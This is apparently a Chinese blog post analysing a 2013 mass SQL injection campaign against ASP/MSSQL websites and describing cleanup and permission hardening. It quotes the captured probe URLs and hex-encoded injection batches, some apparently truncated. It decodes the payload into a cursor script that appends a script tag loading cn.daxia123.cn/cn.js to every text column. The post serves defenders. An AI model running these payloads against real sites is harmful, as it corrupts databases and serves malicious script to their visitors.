现在的位置: 首页 > 综合 > 正文

cn.daxia123.cn/cn.js MSSQL注入处理

2013年08月10日 ⁄ 综合 ⁄ 共 2874字 ⁄ 字号 评论关闭

注入样本:

 

第一次使用

http://xxx.xxx.xxx/xxx.asp?xxx=xxx'
AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))

+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 AnD ''='

第二次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx%'
AnD (sElEcT ChAr(94)+cAsT(CoUnT(1) aS VaRcHaR(100))

+ChAr(94) fRoM [mAsTeR]..[sYsDaTaBaSeS])>0 And '%'='

 

检查是否有漏洞!

 

 

第三次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx;dEcLaRe
@S VaRcHaR(4000) SeT @s=cAsT

(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C4

15245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616

D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F4

37572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432

36E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437

572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4

3415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

第四次使用
[url=http://xxx.xxx.xxx/xxx.asp?xxx=xxx%]http://xxx.xxx.xxx/xxx.asp?xxx=xxx%'[/url] ;dEcLaRe

@S VaRcHaR(4000) SeT @s=cAsT

(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C4

15245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616

37572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432

572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4

3415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);-- aNd '%'='

第五次使用
http://xxx.xxx.xxx/xxx.asp?xxx=xxx';dEcLaRe
@S VaRcHaR(4000) SeT @s=cAsT

(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C4

15245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616

92C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E6

36E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437

572736F7220494E544F24E4420434C4F5345205461626C655F437572736F72204445414C4C4F4

3415445205461626C655F437572736F72 aS VaRcHaR(4000));eXeC(@s);--

 

可使用查询分析器来翻译。

 

cn.js注入编码是:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b


WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR

(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

 

主要是通过:SELECT a.name,b.name FROM sysobjects a,syscolumns b


来获得可注入字段,因此可关闭此权限来防此注入.

 

处理:

1.清理现有数据库

2. 不要使用sa用户连接数据库
3、新建一个public权限数据库用户,并用这个用户访问数据库

 

security -> Logins -> username -> 右键-属性 -> database Access -> database name-> public -> Properties -> Permissions -> SELECT列 在sysobjects与syscolumns上面打“×”

 

抱歉!评论已关闭.